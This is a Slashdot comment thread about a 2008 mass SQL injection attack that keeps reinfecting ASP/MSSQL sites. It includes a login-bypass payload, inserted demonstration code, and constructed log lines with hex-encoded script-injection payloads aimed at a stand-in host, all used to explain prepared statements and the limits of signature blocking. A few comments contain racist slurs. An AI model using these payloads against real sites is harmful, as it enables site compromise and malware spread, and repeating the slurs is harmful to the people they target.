
Relentless Web Attack Hard To Kill

kdawson posted more than 5 years ago | from the stay-dead-willya dept.

Security 218

ancientribe writes "The thousands of Web sites infected by a new widespread SQL injection attack during the past few days aren't necessarily in the clear after they remove the malicious code from their sites. Researchers from Kaspersky Lab have witnessed the attackers quickly reinfecting those same sites all over again. Meanwhile, researchers at SecureWorks have infiltrated the Chinese underground in an attempt to procure a copy of the stealthy new automated tool being used in the attacks."


Chinks get their Interwebs on! (-1, Flamebait)

Anonymous Coward | more than 5 years ago | (#25737073)

Chinkies broked the web. :(

This... (-1, Troll)

Anonymous Coward | more than 5 years ago | (#25737081)

...is NOT the First Post.

Re:This... (1)

stonedcat (80201) | more than 5 years ago | (#25737845)

Amazing! You're telepathetic!

Kaspersky (-1, Offtopic)

mfh (56) | more than 5 years ago | (#25737087)

It's because of security reports like this, I always recommend Kaspersky [kaspersky.com] security suite over any other anti-virus solution available (free or otherwise). These guys are in the internet-trenches fighting for a more secure internet, and a more secure planet. It is widely known that they are the best in the business. So while many users will try and limp by on free anti-virus, Kaspersky just updated all my computers with protection against these attacks.

Re:Kaspersky (1, Flamebait)

RaceProUK (1137575) | more than 5 years ago | (#25737133)

Kaspersky is so brilliant, it locks up every time I try to do anything with it.

Then again, my AVG hasn't updated properly all week...

Re:Kaspersky (4, Informative)

mfh (56) | more than 5 years ago | (#25737203)

Kaspersky is so brilliant, it locks up every time I try to do anything with it.

Then again, my AVG hasn't updated properly all week...

You're not supposed to run them at the same time. They fight for control and eventually stalemate. Uninstall AVG and reinstall Kaspersky, but by now you may have damaged your system configuration. Kaspersky is pretty brutal if it gets unhinged, but it's unstoppable if you get it configured correctly.

Re:Kaspersky (1)

RaceProUK (1137575) | more than 5 years ago | (#25737313)

Should have mentioned: Kaspersky's on my work PC, and AVG on my home PC.

Re:Kaspersky (3, Insightful)

martinw89 (1229324) | more than 5 years ago | (#25737377)

...AVG...

<mechanic>Well there's your problem.</mechanic>

Re:Kaspersky (3, Informative)

liquidpele (663430) | more than 5 years ago | (#25737333)

Thank you for that advertisement, but these are SQL Injection attacks, which an antivirus will not catch.

RTFA (1)

mfh (56) | more than 5 years ago | (#25737519)

Thank you for that advertisement, but these are SQL Injection attacks, which an antivirus will not catch.

Didn't you RTFA? This story is about how Kaspersky caught the attacks... :S

Re:RTFA (3, Funny)

Bassman59 (519820) | more than 5 years ago | (#25737943)

Didn't you RTFA?

You must be new here, in spite of that two-digit user ID!

Re:RTFA (3, Funny)

Anonymous Coward | more than 5 years ago | (#25738429)

You must be new here, in spite of that two-digit user ID

He probably is new. I saw Slashdot UID 56 for sale on E-Bay about a month ago for 17 cents or 4 sticks of Trident.

Re:RTFA (2, Informative)

liquidpele (663430) | more than 5 years ago | (#25737975)

They said the company caught the attacks and investigated them, I didn't see anywhere where it said their product caught and stopped them.

Also, you *can* write checks to block specific known SQL Injection attacks if the product also acts as a firewall, but otherwise it is impossible since there are no file system files to scan.

Re:Kaspersky (4, Funny)

Anonymous Coward | more than 5 years ago | (#25737403)

"Securing an environment of Windows platforms from abuse - external or internal - is akin to trying to install sprinklers in a fireworks factory where smoking on the job is permitted." -Gene Spafford

Re:Kaspersky (2, Interesting)

mordred99 (895063) | more than 5 years ago | (#25738741)

I take every syllable that comes out of Eugene Spafford's mouth with a pound of salt. I speak as a Purdue Graduate and Security Professional.

Re:Kaspersky (1)

dedazo (737510) | more than 5 years ago | (#25737489)

(This post brought to you by Kapersky Labs. Not detecting SQL injection vulnerabilities on servers since 2003!)

Re:Kaspersky (0)

Anonymous Coward | more than 5 years ago | (#25737629)

Maybe they were able to hijack the OP's /. account using this exploit, who knows? And it would be a really good proof of concept: "look, even a Slashdotter with a 2-digit ID is powerless, you're doomed, so please buy our products".

Re:Kaspersky (4, Insightful)

Arancaytar (966377) | more than 5 years ago | (#25737535)

It's a bloody SQL injection attack. I'd like to see your virus checker automatically rewrite your web application to use input filtering.

What these people need is a real web application instead of some self-built PHP script - not a virus scanner, whether free or expensive.

Big Picture (4, Interesting)

mfh (56) | more than 5 years ago | (#25737707)

It's a bloody SQL injection attack. I'd like to see your virus checker automatically rewrite your web application to use input filtering.

This is going to sound like a little bit of double speak but I'll remind you that Kaspersky found these attacks were happening. Also, they are studying the behavior. Furthermore, Kaspersky protects systems from nefarious things that attackers will do, regardless of how they get on the system. Nothing is perfect with Windows, but if you look at the options, Kaspersky is the best out there.

Now of course, if you want to insist that the attacks happen whether Kaspersky is running or not, you will be correct. But what you're not saying is how LIMITED the attackers are when trying to get past Kaspersky after they get on a system.

Noscript also helps, but isn't perfect either.

Re:Kaspersky (1)

LandDolphin (1202876) | more than 5 years ago | (#25737849)

"I'd like to see your virus checker automatically rewrite your web application to use input filtering."

Now that's an Anti-Virus software I'd pay for!

Re:Kaspersky (1)

ceejayoz (567949) | more than 5 years ago | (#25737853)

What these people need is a real web application instead of some self-built PHP script - not a virus scanner, whether free or expensive.

Uh, this exploit is targeting ASP/MSSQL.

Re:Kaspersky (1)

mfh (56) | more than 5 years ago | (#25737899)

Uh, this exploit is targeting ASP/MSSQL.

And to be fair, there are two attacks going on. #1 is getting the SQL on the server (which is impossible to detect unless your code is ok) and then there are the aftermath attacks that the SQL code launches when a browser executes Javascript when browsing, WHICH KASPERSKY PROTECTS YOU AGAINST.

Unless you run a website, you won't care about the first attack, and the second one you ARE protected against if you have a decent configuration.

Re:Kaspersky (1)

Joce640k (829181) | more than 5 years ago | (#25737651)

Do you know what an SQL injection attack is?

Clue: It's not something an antivirus can ever protect people from.

No kaspersky for me (3, Funny)

jonaskoelker (922170) | more than 5 years ago | (#25738145)

zsh% apt-cache search kaspersky
zsh%

:(

Re:Kaspersky (1)

DerCorny (1227862) | more than 5 years ago | (#25738193)

So? Before you do free advertisement, do some more research: http://blogs.zdnet.com/security/?p=1516 [zdnet.com] They can't even protect their own sites ...

relentless (-1, Troll)

Anonymous Coward | more than 5 years ago | (#25737107)

Relentless, like a nigger asking for a handout?

Re:relentless (-1, Troll)

Anonymous Coward | more than 5 years ago | (#25737349)

No, more like a Republican trying to convince the public that Sarah Palin isn't full-on retarded, no matter how good she looks in a short skirt.

first post (-1, Offtopic)

Dan541 (1032000) | more than 5 years ago | (#25737109)

:P

Re:first post (0, Offtopic)

Dan541 (1032000) | more than 5 years ago | (#25737135)

Dammm,

Where's the "-1 fail"

Re:first post (2, Informative)

martinw89 (1229324) | more than 5 years ago | (#25737303)

Don't worry, your "-1 fail"® moderation is being applied at this moment. Thank you for using Slashdot©, please come again.

Re:first post (1)

windsurfer619 (958212) | more than 5 years ago | (#25737717)

Good point! We'll need a "-1 not funny" while you're at it, too!

Re:first post (1)

martinw89 (1229324) | more than 5 years ago | (#25737769)

I think you dropped this [instantrimshot.com] .

Re:first post (1)

Chris Burke (6130) | more than 5 years ago | (#25737713)

Where's the "-1 fail"

In your heart, my friend. In your heart.

Re:first post (0)

Anonymous Coward | more than 5 years ago | (#25737173)

Why is it that when someone decides they have the karma to burn and make a "first post", someone else already posted something long and informative?

If you're going to waste the karma, at least do it right. Sheesh.

Whatever happened (5, Insightful)

RaceProUK (1137575) | more than 5 years ago | (#25737111)

to fixing the hole? It's like fixing a car coolant leak by pouring more water in the radiator.

Re:Whatever happened (2, Informative)

compro01 (777531) | more than 5 years ago | (#25737283)

AFAICT, they are patching the hole, they're just finding even more holes of the same type.

Re:Whatever happened (0)

Anonymous Coward | more than 5 years ago | (#25738337)

So, basically, their rad hose is perforated. Time to get a new one, preferably from a better manufacturer.

Re:Whatever happened (1)

gurps_npc (621217) | more than 5 years ago | (#25737689)

The problem is, they don't have "a hole", they have swiss cheese. The reason they have swiss cheese is that the people responsible for securing their machines take 3 days to do something that should be done in ten minutes.

Re:Whatever happened (0)

Anonymous Coward | more than 5 years ago | (#25738243)

Has been working for us for years...

Steve B.

It's the plugins... (2, Insightful)

sam0737 (648914) | more than 5 years ago | (#25737171)

At the end of the day it's the problem of plugins...I mean, besides the fact that the website is being infected, it's the flaws and vulnerabilities of the ActiveX/Browser plugins that allow this kind of activity to be profitable.

Just yet another reason, besides bandwidth, to get Flashblock.

And install as few as browsers plugins/ActiveX as possible.

Re:It's the plugins... (1)

larry bagina (561269) | more than 5 years ago | (#25737921)

They could fill the website with links to v1agr@, svbpr1me m0rtg@g3s, and geniune r0lexxs.

noscript (5, Informative)

Manfre (631065) | more than 5 years ago | (#25737191)

NoScript is one of the best ways to avoid viruses that are distributed from the web.

Re:noscript (1)

NorQue (1000887) | more than 5 years ago | (#25737879)

Until someone discovers an exploitable bug in noscript. ;)

Re:noscript (1)

Bryansix (761547) | more than 5 years ago | (#25737945)

If you want to break a shitload of websites like uhm say the custom CRM that I support for my company that our own developers write in ASP.NET!

Re:noscript (0)

Anonymous Coward | more than 5 years ago | (#25738111)

It's rare that I care enough about visiting a website that REQUIRES Javascript for me to actually go to the trouble of enabling Javascript. Most of the time, when I see a site requiring Javascript, I assume that I am not in their target demographic, and I close that tab.

Re:noscript (1)

Bryansix (761547) | more than 5 years ago | (#25738237)

I think you missed the point that the COMPANY I WORK FOR REQUIRES I SUPPORT THIS WEBSITE! Geez. Target Demographic?! You don't even know what that term means.

Re:noscript (1, Informative)

RpiMatty (834853) | more than 5 years ago | (#25738475)

SO WHY CAN'T YOU WHITELIST THE SITE THAT YOU HAVE TO SUPPORT? Along with any other sites you support?

It's not that hard to build up a whitelist. The first time you visit a "trusted" or regular site, add it to the whitelist. Does it have any subdomains, or "partner" domains that you also need to add? Go ahead and add them.

So many people complain about how NoScript breaks pages, but it's really not that hard at all to set up a whitelist.

Now when you're redirected to / accidentally click on a link to dgdrklgdr.com/e3rer it can't run any javascript on your PC.

Re:noscript (0)

Anonymous Coward | more than 5 years ago | (#25738185)

If you want to break a shitload of websites like uhm say the custom CRM that I support for my company that our own developers write in ASP.NET!

True, the first few days of using NoScript you will run into "problems" on nearly every page you visit, but that is simply the software learning what is "trusted" and what isn't (everything else). After that, NoScript is damned useful keeping the sketchy web developers away from your personal info.
If a site REQUIRES JavaScript or Flash to work (and I've never used it before) then it is not worth anyone's time to visit.

Re:noscript (1)

Manfre (631065) | more than 5 years ago | (#25738219)

The developers are doing something wrong if the CRM mandates XSS javascript.

Re:noscript (1)

Bryansix (761547) | more than 5 years ago | (#25738383)

You're doing something wrong by talking about something you have no idea about. ASP.NET is a programming language that is BOTH compiled and interpreted. The intermediate step language is run upon demand and spits out a combination of HTML and Javascript to render the webpages.

Re:noscript (3, Informative)

Manfre (631065) | more than 5 years ago | (#25738667)

I've been developing with ASP.NET (c#) since its initial beta and am very familiar with how it functions. This discussion would go a bit smoother if you would read a comment before replying to it. Noscript prevents javascript from loading on any site, until the site is explicitly given permission by the user. Approve your CRM domain(s), which will allow it to work properly. Then if it is compromised, noscript will block the javascript on the destination domain. If your server is compromised to the point where it is hosting exploits, then the IT staff needs to spend a bit more effort patching and locking things down. Noscript is not the only protection that should be used, but it greatly helps. It's like driving a car a little bit slower. You've still got a seatbelt to help keep you alive, but you should be less likely to hit something.

No, it's not. (3, Informative)

Bearhouse (1034238) | more than 5 years ago | (#25738399)

You're right to publicise a good product that I also use and recommend. However:

Most people that get caught by malware don't understand all these arcane details.

Most people use IE, (no noscript here..) and blindly click 'OK' when they cannot see the porn.

Bad web sites / pages don't just install viruses.*

Infiltration (2, Funny)

Anonymous Coward | more than 5 years ago | (#25737239)

SecureWorks: Can I have a copy of your super secret automated tool?

ChineseUnderground: No...

Meanwhile... (1)

girlintraining (1395911) | more than 5 years ago | (#25737251)

Secureworks... Announcing the fact that you're trying to covertly gain access to these tools rather defeats the point, don't you think? It's like going into the ghetto with a sign on your back that says "Undercover Drug Officer". Secureworks, I see two possibilities for this level of stupidity: management, and your researchers. If by some statistical fluke it was your researchers that had the idea of publicizing this... please have your researchers develop some street smarts and common sense. I don't mean this as a dig at you; this is professional advice... Get them out of the labs and back into the real world and do it now before you really embarrass yourself. Now, the more likely answer is someone in management thought this would be a great opportunity for publicity. Shoot them... and use silver bullets. PHBs are notoriously hard to kill.

Re:Meanwhile... (1)

An ominous Cow art (320322) | more than 5 years ago | (#25737593)

> PHBs are notoriously hard to kill.

Only if you're working for the ship's cook.

Re:Meanwhile... (1)

jeffmeden (135043) | more than 5 years ago | (#25737615)

The post you read must have looked like this:
  "Meanwhile, researchers at SecureWorks have infiltrated the Chinese underground using the alias of S00p3r-1337 in an attempt to convince them to e-mail a copy of the stealthy new automated tool being used in the attacks to viruscheckers@secureworks.com"

Which is weird because that's not what I saw...

Infected Websites (3, Interesting)

sexconker (1179573) | more than 5 years ago | (#25737297)

Can someone explain to me how websites get infected?

Oh, that's right, running ads and other shit from shady people (directly or indirectly).

I really wish websites would simply stop hosting foreign (not theirs, not trusted, not checked) code and content.

Re:Infected Websites (1)

sexconker (1179573) | more than 5 years ago | (#25737339)

Just so we're clear, that includes flash and pdf.

Re:Infected Websites (1)

corsec67 (627446) | more than 5 years ago | (#25737523)

Oh, that's right, running ads and other shit from shady people (directly or indirectly).

The article says that the websites are getting hit with a sql injection [wikipedia.org] attack, so ads shouldn't be the problem, unless the ad server is vulnerable.

This probably has nothing to do with ads and more to do with failing to validate user input. (Obligatory xkcd [xkcd.com] reference)

Re:Infected Websites (1)

sexconker (1179573) | more than 5 years ago | (#25738099)

In this case, yes, but see above:

I really wish websites would simply stop hosting foreign (not theirs, not trusted, not checked) code and content.

Re:Infected Websites (1)

CaptSaltyJack (1275472) | more than 5 years ago | (#25738559)

You know not what you're talking about.

SQL injection attacks involve passing SQL code through the query-string. On a simple level:

An attacker sees that, and changes the URL in their browser to:

Of course, that's on a very simplistic level. They do much worse things, like throw in entire coded blocks of SQL code to do all kinds of malicious things, like insert script tags pointing to their site.

More sophisticated attackers have bots that have a catalog of online stores' known weaknesses (for instance, CandyPress - piece of garbage), and it knows exactly which pages to target.

Re:Infected Websites (1)

Hatta (162192) | more than 5 years ago | (#25738803)

I really wish websites would simply stop hosting foreign (not theirs, not trusted, not checked) code and content.

I really wish websites would simply stop expecting me to run their code.

This disgusts me (3, Insightful)

77Punker (673758) | more than 5 years ago | (#25737323)

I develop web applications for a living right now and as someone who's only been in this game for a few months, this disgusts me. I already know how to prevent SQL injection with prepared statements. It's easy to do and requires no extra knowledge, so why doesn't everyone do this?

Re:This disgusts me (1, Insightful)

Anonymous Coward | more than 5 years ago | (#25737391)

You might know, but the intern who developed the crappy PHP4 app 8 years ago did not, and it would cost too many man-days to fix the code.

Re:This disgusts me (3, Insightful)

Rycross (836649) | more than 5 years ago | (#25737411)

The problem is a frightening amount of training material on the web uses concatenated SQL strings to teach SQL. Pull up your average PHP/.Net/Java SQL tutorial and odds are that it will be concatenating strings. Throw that in with the fact that roughly half of the programmers reading that are going to be below average, and there you go.

Re:This disgusts me (4, Funny)

Pope (17780) | more than 5 years ago | (#25737517)

I'd say fully half of all the programmers are going to be below average...

Re:This disgusts me (4, Funny)

77Punker (673758) | more than 5 years ago | (#25737553)

I'd say fully half of them will be below median.

Re:This disgusts me (1, Insightful)

Anonymous Coward | more than 5 years ago | (#25737703)

I say that fully half of programmers will be below median, assuming there's an even number of programmers.
All bets are off if there's an odd number of programmers.

Re:This disgusts me (1)

spiffmastercow (1001386) | more than 5 years ago | (#25737725)

That depends on two things:
1.) Are there equal programmers?
2.) Is the number of programmers even or odd?

Re:This disgusts me (3, Insightful)

corsec67 (627446) | more than 5 years ago | (#25737569)

Throw that in with the fact that roughly half of the programmers reading that are going to be below average

Um for anything that is approximately normally distributed,... half of the X are going to be below average. (Especially if it is a continuous variable and you use the median)

Re:This disgusts me (0)

Anonymous Coward | more than 5 years ago | (#25738371)

I believe you missed the joke.

Re:This disgusts me (1)

overunderunderdone (521462) | more than 5 years ago | (#25738447)

*woosh*

Erm - yes, it was a joke... (0)

Anonymous Coward | more than 5 years ago | (#25738813)

I guess you need to have someone explain it...

Re:This disgusts me (1)

Not The Real Me (538784) | more than 5 years ago | (#25737873)

"...Pull up your average PHP/.Net/Java SQL tutorial and odds are that it will be concatenating strings..."

That and I run into programmers who have over ten years working in the field who absolutely refuse to work with databases any other way. They freak out when you tell them data access is via parameterized stored procedures.

Re:This disgusts me (2, Insightful)

CodeBuster (516420) | more than 5 years ago | (#25738641)

Throw that in with the fact that roughly half of the programmers reading that are going to be below average, and there you go.

That is what comes of outsourcing and offshoring especially, but there are still managers out there who refuse to acknowledge what I like to call the Iron Law of Software Development or more generally the Project Triangle [wikipedia.org] (good, fast, cheap...pick two).

Re:This disgusts me (0, Troll)

tripdizzle (1386273) | more than 5 years ago | (#25737481)

Not trying to insult here (I'm no programmer), but since you say you've been doing what you are doing for just a few months, I am guessing the attack is more advanced than what your prepared statements are going to block, since a major site like Travelocity is being hit, and Kaspersky is not yet able to find a solution.

Re:This disgusts me (1)

Jeff Hornby (211519) | more than 5 years ago | (#25737711)

No, he's right. Prepared statements are how you block SQL Injection attacks.

Re:This disgusts me (4, Informative)

NNKK (218503) | more than 5 years ago | (#25737757)

You're right, you're no programmer. Go read up:

http://en.wikipedia.org/wiki/SQL_injection [wikipedia.org]

Prepared (or parametrized) statements are an easy and absolute defense against SQL injection attacks. The OP is right, the fact that such attacks still succeed is disgusting and inexcusable.

Re:This disgusts me (2, Funny)

77Punker (673758) | more than 5 years ago | (#25737795)

The more I think about it, the more I think your post should read

"...disgusting, inexcusable, and potentially hilarious."

Re:This disgusts me (1)

dzfoo (772245) | more than 5 years ago | (#25738103)

I agree. Headlines with "SQL injection" make me chuckle; but including Travelocity.com and other high profile sites in the victims list is priceless!

      -dZ.

Re:This disgusts me (1)

tripdizzle (1386273) | more than 5 years ago | (#25737995)

Then why hasn't Kaspersky or Travelocity figured this out?

Re:This disgusts me (3, Insightful)

77Punker (673758) | more than 5 years ago | (#25738129)

Kaspersky can't figure it out because a virus scanner can't fix a web application. Fixing SQL injections is beyond their realm.

Travelocity can't figure it out because their developers must suck. Travelocity is well-known because they have a decent service, not because the software that runs the service is really great software.

Re:This disgusts me (2, Insightful)

delirium28 (641609) | more than 5 years ago | (#25738135)

They're most likely trying to find a solution that doesn't require them to revisit and re-code a large portion of their site. They most likely want a band-aid solution rather than fix the underlying problem.

Re:This disgusts me (4, Insightful)

Emb3rz (1210286) | more than 5 years ago | (#25738159)

You're working off of the false assumption that security is about knowledge.

We know abundantly well exactly how SQL injection attacks occur, and we also have many tools at our disposal to -absolutely- prevent them. What we don't have is the cooperation or effort from programmers on a widespread basis. Many are simply too lazy to research and implement reasonable security measures. It's easier to pretend that there are no ways whatsoever that anything can go wrong with your code because when you tested it, it worked right. This willful turning of a blind eye to well-established security caveats is what has given us this terrible and prevalent security problem. It's easier to write code that checks nothing, it's quicker to do so, and it requires less think-juice on the part of the lazy programmer.

Re:This disgusts me (1)

JoelisHere (992325) | more than 5 years ago | (#25738381)

More than likely the lack of cooperation comes from the managers and project managers whose response, when told by their programmers that all their SQL queries need to be rewritten to use prepared statements to prevent SQL injection attacks, was, "Well, we haven't had any problems yet. And that would take too long."

Re:This disgusts me (1)

dzfoo (772245) | more than 5 years ago | (#25738163)

Kaspersky has, I can assure you; they just figured that there will always be stupid programmers out there doing crap, buggy code, and decided to help mitigate the consequences.

As for Travelocity, they probably hired cheap programmers or a third-party contractor who employs inexperienced code monkeys. Bad programmers are more common than you think!

      -dZ.

Re:This disgusts me (1)

blincoln (592401) | more than 5 years ago | (#25738167)

Prepared (or parametrized) statements are an easy and absolute defense against SQL injection attacks.

They're actually not an absolute protection. If anything you are doing ends up working with stored procedures that do concatenation internally, your prepared statements can still end up allowing a SQL injection.

Prepared statements are a very, very good idea that provides a lot of built-in resistance to SQL injection, but they're not bulletproof.

Re:This disgusts me (1)

dzfoo (772245) | more than 5 years ago | (#25738231)

Well, of course, you should never underestimate the tenacity of stupid programmers.

Re:This disgusts me (4, Insightful)

Emb3rz (1210286) | more than 5 years ago | (#25738083)

The idea of a SQL Injection attack is to pass a parameter in such a way that it changes the structure of the query itself. Typical beginner's SQL query:

sql = "SELECT * FROM Users WHERE Username = '" & Request.Form("Username") & "' AND Password = '" & Request.Form("Password") & "';"

This uses 'String Concatenation' to build a line of text from several smaller parts. The completed string is then, in this example, executed by a database. A new query is dynamically created and executed based on the text passed to it. Thus, we are able at this point to change what query will be run. Form data:

Username = "Admin"
Password = "x' OR 'e' = 'e"

So when the string is being put together, we get:

SELECT * FROM Users WHERE Username = 'Admin' AND Password = 'x' OR 'e' = 'e';

Certainly, even with no programming experience, one can see that the letter E will always be equivalent to the letter E. Thus, any validation of the password will return a false positive.

Prepared statements avoid this whole deal by only allowing you to pass parameters. The query is already set in stone. You cannot change how it basically works, only its criteria / filtering / etc. A prepared statement would execute basically:

SELECT * FROM Users WHERE Username = "Admin" AND Password = "x' OR 'e' = 'e";

Since the query does not change dynamically when it's executed as a prepared statement, you can't add your logical 'OR' operator after having broken out of your parameter. You just get no rows returned, as should be the case.
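The two queries from the comment above, run for real. This is an added example and not code from the comment or from the article: it builds an in-memory SQLite table with two constructed user rows (the Users/Username/Password names are the comment's; the row contents are made up) and runs the same login check both ways with the comment's own password payload.

```python
import sqlite3

# Constructed sample data (not from the article): two users in an in-memory
# SQLite table with the same Users/Username/Password names the comment uses.
SAMPLE_USERS = [("Admin", "correct horse"), ("guest", "guest")]

# The password value from the comment above.
PAYLOAD = "x' OR 'e' = 'e"


def make_db():
    """Create the in-memory database and load the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def login_concat(conn, username, password):
    """Vulnerable: the beginner's query built by string concatenation.

    The caller's text is pasted into the SQL, so a quote in the password
    closes the literal and the rest is parsed as SQL grammar.  With the
    payload above the WHERE clause becomes
        Username = 'Admin' AND Password = 'x' OR 'e' = 'e'
    and, because AND binds tighter than OR, every row matches.
    """
    sql = ("SELECT Username FROM Users WHERE Username = '" + username
           + "' AND Password = '" + password + "';")
    return [row[0] for row in conn.execute(sql)]


def login_param(conn, username, password):
    """Fixed: the same query as a parameterized (prepared) statement.

    The SQL text is compiled with two placeholders and the values are bound
    afterwards, so the quote in the password is only a character inside the
    data and can never change the statement's structure.
    """
    sql = "SELECT Username FROM Users WHERE Username = ? AND Password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


if __name__ == "__main__":
    db = make_db()
    print("concatenated:", login_concat(db, "Admin", PAYLOAD))   # every user
    print("parameterized:", login_param(db, "Admin", PAYLOAD))   # no rows
    print("real password:", login_param(db, "Admin", "correct horse"))
```

The binding only protects the layer that does it. If the parameterized call hands the value to a stored procedure that rebuilds SQL from its arguments by concatenation, as a comment further up warns, the same hole reopens inside the database where the application cannot see it.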

Re:This disgusts me (1)

Yetihehe (971185) | more than 5 years ago | (#25737565)

It's very often simple laziness. In the latest project which I'm working on I did one function: function q($str). It's even easier to use than prepared statements; it just filters everything not supposed to be there. But why other devs don't always use it is beyond me.

Re:This disgusts me (1)

larry bagina (561269) | more than 5 years ago | (#25737983)

I'm not sure how that's simpler, but you might still be vulnerable with invalid utf-8 strings.

The link above leads to an infected site (0)

Anonymous Coward | more than 5 years ago | (#25737335)

Not really - but it would be ironic if it was

Install a proxy (4, Interesting)

gfilion (80497) | more than 5 years ago | (#25737443)

We had this problem a few months back at work. Old but necessary asp web sites kept getting infected. It only took a few hours to install a reverse proxy with mod_security on EC2 and we were in the clear.

Full story on my blog:
http://guillaume.filion.org/blog/archives/2008/05/i_love_ec2_and_rightscale.php [filion.org]

Re:Install a proxy (3, Informative)

merreborn (853723) | more than 5 years ago | (#25738573)

mod_security is a reactive security measure. It's blacklist based, which makes the classic error of attempting to "enumerate badness" [ranum.com] .

While it's great if you've identified an existing threat to an application you cannot properly secure, it does nothing to protect you against future attacks using less obvious techniques.

mod_security alone is not an adequate solution. It's still necessary to proactively write secure applications in the first place, which means making sure you're never allowing raw, unfiltered/unescaped user data into places where it shouldn't go.
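What "enumerate badness" looks like in practice, as an added example that is not code from the article, from the commenters, or from mod_security itself. A comment further up notes that a firewall-style product can block specific known injection strings; this block plays that product, with a small signature list run over four constructed access-log lines (a benign request and three hostile ones). Each detector version below was written after the previous one let a sample through. The injected statement, the hostnames and the log lines are all made up for the example.

```python
import re
from urllib.parse import quote, unquote_plus, urlsplit

# Hypothetical statement an attacker wants the server to run; used only to
# build the constructed log lines below (nothing here is from the article).
INJECTED = "UPDATE pages SET body=body+'<script src=//example.invalid/a.js></script>'"
HEX_LITERAL = "0x" + INJECTED.encode("ascii").hex().upper()

# Constructed access-log lines: a benign request followed by three hostile
# query strings, each harder for a signature to see than the last.
SAMPLE_LOG = [
    "GET /products.asp?id=42 HTTP/1.1",
    # 1: statement sent in the clear
    "GET /products.asp?id=42;" + quote(INJECTED) + " HTTP/1.1",
    # 2: keyword pair split by an inline comment
    "GET /products.asp?id=42%20UNION/**/SELECT%20null,null-- HTTP/1.1",
    # 3: whole statement hidden in a hex literal and run via CAST/EXEC
    "GET /products.asp?id=42;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST("
    + HEX_LITERAL + "%20AS%20VARCHAR(4000));EXEC(@S) HTTP/1.1",
]

# The "known bad" list: a few fragments that appear in the injected SQL.
SIGNATURES = re.compile(r"union\s+select|<script|update\s+\w+\s+set", re.I)


def query_of(line):
    """URL-decoded query string of a 'METHOD path HTTP/x' log line."""
    path = line.split(" ", 2)[1]
    return unquote_plus(urlsplit(path).query)


def strip_comments(q):
    """Replace /* ... */ with a space and collapse runs of whitespace."""
    q = re.sub(r"/\*.*?\*/", " ", q)
    return re.sub(r"\s+", " ", q)


def decode_hex_literals(q):
    """Replace 0xABCD... literals with the text they encode."""
    def repl(m):
        digits = m.group(1)
        if len(digits) % 2:
            return m.group(0)
        return bytes.fromhex(digits).decode("latin-1")
    return re.sub(r"0x([0-9A-Fa-f]+)", repl, q)


def flag_naive(line):
    """Version 1: match signatures against the decoded query string."""
    return bool(SIGNATURES.search(query_of(line)))


def flag_normalized(line):
    """Version 2: written after sample 2 slipped past version 1."""
    return bool(SIGNATURES.search(strip_comments(query_of(line))))


def flag_decoded(line):
    """Version 3: written after sample 3 slipped past version 2."""
    q = decode_hex_literals(strip_comments(query_of(line)))
    return bool(SIGNATURES.search(q))


def scan(lines, flag):
    """Apply one detector version to every line; True means 'blocked'."""
    return [flag(line) for line in lines]


if __name__ == "__main__":
    for name, flag in (("naive", flag_naive), ("normalized", flag_normalized),
                       ("decoded", flag_decoded)):
        print(f"{name:>10}:", scan(SAMPLE_LOG, flag))
```

Each version catches exactly the trick that defeated the one before it; a payload assembled with CHAR() calls, a keyword the list does not know, or a second encoding layer passes all three until another rule is added. That maintenance loop never ends, which is the point of the comment above: the parameterized query has no list to keep up to date.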

yet another ugly side of DRM (3, Insightful)

Aoet_325 (1396661) | more than 5 years ago | (#25737453)

"The toolkit is protected with a layer of digital rights management and appears to be sold mainly in China. "

This is why I don't believe in "Trusted" computing.
When software or hardware are used to take control of a computer away from that computer's owner, bad things will happen.

Chinese underground (4, Funny)

AragornSonOfArathorn (454526) | more than 5 years ago | (#25737501)

Is it like Big Trouble in Little China, with the lightning ninjas and floating eye thing? Did they get Kurt Russel to help?

If so, that would be AWESOME.

No DRM trolls? (4, Funny)

genner (694963) | more than 5 years ago | (#25737685)

Did everyone miss the fact that the toolkit responsible includes some hefty DRM?

Where's the outrage?
Why aren't we demanding an open source solution?

notSoGreat Firewall O' China (1)

sgt scrub (869860) | more than 5 years ago | (#25737973)

Sure! They can block users from nasty ol' Capitalist porn. But do they keep users from attacking overseas networks? Noooooo.

Sorry. I'm in touch with my inner child today.
